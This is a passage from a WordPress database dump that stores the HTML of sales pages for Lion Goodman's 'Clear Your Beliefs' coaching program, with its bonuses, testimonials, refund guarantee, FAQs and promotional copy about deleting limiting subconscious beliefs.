src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a></p>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p> </p>', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 14:35:57', '2014-12-14 19:35:57', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2054, 2, '2014-12-14 14:37:43', '2014-12-14 19:37:43', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " 